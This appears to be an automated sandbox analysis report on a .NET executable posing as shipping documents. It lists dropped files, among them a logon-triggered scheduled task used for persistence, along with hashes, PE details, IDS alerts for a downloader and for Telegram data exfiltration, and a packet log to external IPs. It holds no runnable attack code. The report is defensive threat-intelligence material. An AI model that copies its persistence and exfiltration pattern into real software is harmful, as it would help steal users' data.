SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp

Download File

Process:	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.110738734493718
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNthxvn:cgergYrFdOFzOzN33ODOiDdKrsuTnv
MD5:	635246FF9F1D60B93EEDD040A9165720
SHA1:	83398B7C63C5C582D11ED57BDC8E8C0F9EF8ED6A
SHA-256:	B27CC92D0620B481DAB991D9F153C8D581621F135DD98E0EF60D0BFF6E18ADE0
SHA-512:	41BE19840ED07E4CF8A6D80EB7F2CFB18DC188230906E68AB62B51A3CF849A6A31A6BF7FEEA5C19E62A2F34300028E5DF15602325B7C060926999E964496A9BE
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Download File

Process:	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	785408
Entropy (8bit):	7.9227821227573925
Encrypted:	false
SSDEEP:	12288:EP91/k4FAkr1tSmk4THtLIrDjKyeKwH9+9Ck7huC0eI1Z1Hs5iy4DdWce:+1s4tv2cHtgdVAQ7huC0n1ZNJWc
MD5:	0368A9AA7437BAC59B4253ABD5F99818
SHA1:	F98BD818EE1996762B9F8B79F52DB921009D2C03
SHA-256:	C024729558CDF11515CC4024D0F3118D8313A86C68D48846376C55B8EC97C0E4
SHA-512:	A3B809E9CCBE938BEC9B879D284C473531ADBE21DC765CC730E49EA05411CD21673560208FE4496CB287D9EBCD201F184B1048ED481E4753CE97F15750E4D194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.g................................ ........@.. .......................`............`.................................P...K........(...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....(.......(..................@..@.reloc.......@......................@..B........................H..........`X......o....................................................0..A....... D........%.(...(.....)... .........%.%...(.....&...(.........&....0..L..........\|.....u....}......}.....(.......\|.....u....}...... .... ....(...+.....&.0..7.......+$.E.............................&..+..\|....{...........0..2.......+$.E.............................&..+..{.........*...0..........+0.E........i...........b...........2........&..+..(.........,...+..+.. ...[...(....s....z.{....

C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9227821227573925
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
File size:	785'408 bytes
MD5:	0368a9aa7437bac59b4253abd5f99818
SHA1:	f98bd818ee1996762b9f8b79f52db921009d2c03
SHA256:	c024729558cdf11515cc4024d0f3118d8313a86c68d48846376c55b8ec97c0e4
SHA512:	a3b809e9ccbe938bec9b879d284c473531adbe21dc765cc730e49ea05411cd21673560208fe4496cb287d9ebcd201f184b1048ed481e4753ce97f15750e4d194
SSDEEP:	12288:EP91/k4FAkr1tSmk4THtLIrDjKyeKwH9+9Ck7huC0eI1Z1Hs5iy4DdWce:+1s4tv2cHtgdVAQ7huC0n1ZNJWc
TLSH:	E8F4220F2B995B16C75E4FB7C143A489053BE834D126E7336BDE29A18F39748C25BE81
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.g.....................*........... ........@.. .......................`............`................................

File Icon


Icon Hash:	33362c2d36335470

Static PE Info

General

Entrypoint:	0x4bee9e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677F43DD [Thu Jan 9 03:34:53 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbee50	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x2800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbcea4	0xbd000	6bdda0485c195bd739bf5ef52c610673	False	0.9513514281580688	data	7.928729441238618	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x2800	0x2800	da820b5474484e1783742f85ea7a62d7	False	0.8794921875	data	7.615373961630812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	d31f5fee8a235e705f16764431e60de3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc00c8	0x2356	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9427371213796153
RT_GROUP_ICON	0xc2430	0x14	data	1.05
RT_VERSION	0xc2454	0x378	data	0.39414414414414417

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T15:08:04.141020+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-09T15:08:05.172367+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-09T15:08:05.775992+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49709	104.21.80.1	443	TCP
2025-01-09T15:08:06.516013+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49710	132.226.247.73	80	TCP
2025-01-09T15:08:07.260244+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-09T15:08:11.224332+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49719	104.21.80.1	443	TCP
2025-01-09T15:08:16.073489+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49726	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 15:08:03.119858980 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:03.124771118 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:03.124841928 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:03.126188993 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:03.130975008 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:03.797022104 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:03.844163895 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:03.869067907 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:03.874298096 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:04.095330000 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:04.141020060 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:04.151642084 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.151700020 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.151770115 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.157386065 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.157406092 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.624696016 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.624768972 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.641344070 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.641385078 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.641779900 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.687891960 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.711874008 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.755333900 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.820110083 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.820265055 CET	443	49708	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:04.820322037 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.824522018 CET	49708	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:04.828701973 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:04.833513021 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:05.130068064 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:05.135973930 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.136018991 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.136192083 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.136737108 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.136751890 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.172367096 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.623883009 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.626418114 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.626456976 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.776083946 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.776212931 CET	443	49709	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:05.776444912 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.777721882 CET	49709	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:05.781076908 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.781085014 CET	49710	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.789042950 CET	80	49710	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:05.789191008 CET	49710	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.789212942 CET	80	49706	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:05.789347887 CET	49706	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.796746016 CET	49710	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:05.804625988 CET	80	49710	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:06.463402033 CET	80	49710	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:06.476629972 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:06.476671934 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:06.476751089 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:06.479670048 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:06.479681969 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:06.516012907 CET	49710	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:06.962853909 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:06.964402914 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:06.964433908 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:07.260457993 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:07.260639906 CET	443	49712	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:07.260698080 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:07.261059046 CET	49712	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:07.265868902 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:07.271892071 CET	80	49714	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:07.272192955 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:07.272345066 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:07.278157949 CET	80	49714	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:07.951169014 CET	80	49714	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:07.953718901 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:07.953772068 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:07.953934908 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:07.954188108 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:07.954201937 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:08.000411034 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.429131985 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:08.430871010 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:08.430915117 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:08.580028057 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:08.580116034 CET	443	49715	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:08.580174923 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:08.580585003 CET	49715	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:08.584166050 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.585319042 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.590214014 CET	80	49716	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:08.590293884 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.590399027 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.592158079 CET	80	49714	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:08.592267990 CET	49714	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:08.595154047 CET	80	49716	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:09.259701014 CET	80	49716	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:09.260927916 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.260977030 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.261043072 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.261295080 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.261307955 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.312880993 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.736990929 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.738559961 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.738593102 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.887824059 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.887890100 CET	443	49717	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:09.887953043 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.888369083 CET	49717	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:09.891575098 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.892653942 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.896553040 CET	80	49716	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:09.896735907 CET	49716	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.897455931 CET	80	49718	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:09.897525072 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.897664070 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:09.902371883 CET	80	49718	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:10.577900887 CET	80	49718	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:10.579165936 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:10.579209089 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:10.579287052 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:10.579507113 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:10.579524040 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:10.625468016 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.047728062 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.049187899 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.049222946 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.224356890 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.224427938 CET	443	49719	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.224678040 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.224895954 CET	49719	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.232067108 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.233138084 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.237003088 CET	80	49718	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:11.237775087 CET	49718	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.238002062 CET	80	49720	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:11.238502026 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.238620996 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:11.243370056 CET	80	49720	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:11.913813114 CET	80	49720	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:11.914906979 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.915019035 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.915117025 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.915359974 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:11.915394068 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:11.969146013 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.370991945 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:12.372736931 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:12.372829914 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:12.524344921 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:12.524425030 CET	443	49721	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:12.524477005 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:12.524820089 CET	49721	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:12.529786110 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.531078100 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.534936905 CET	80	49720	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:12.535032034 CET	49720	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.535887957 CET	80	49722	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:12.535988092 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.536067009 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:12.540855885 CET	80	49722	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:13.209084988 CET	80	49722	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:13.210742950 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.210849047 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.210937023 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.211230040 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.211261034 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.250420094 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.676597118 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.678203106 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.678250074 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.832334995 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.832498074 CET	443	49723	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:13.832926989 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.833173990 CET	49723	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:13.835925102 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.837078094 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.840953112 CET	80	49722	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:13.841053963 CET	49722	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.841959000 CET	80	49724	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:13.842048883 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.842118979 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:13.846991062 CET	80	49724	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:14.545092106 CET	80	49724	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:14.546735048 CET	49725	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:14.546785116 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:14.546919107 CET	49725	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:14.547107935 CET	49725	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:14.547118902 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:14.594261885 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:15.031719923 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:15.033952951 CET	49725	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:15.033984900 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:15.176040888 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:15.176131010 CET	443	49725	104.21.80.1	192.168.2.5
Jan 9, 2025 15:08:15.176215887 CET	49725	443	192.168.2.5	104.21.80.1
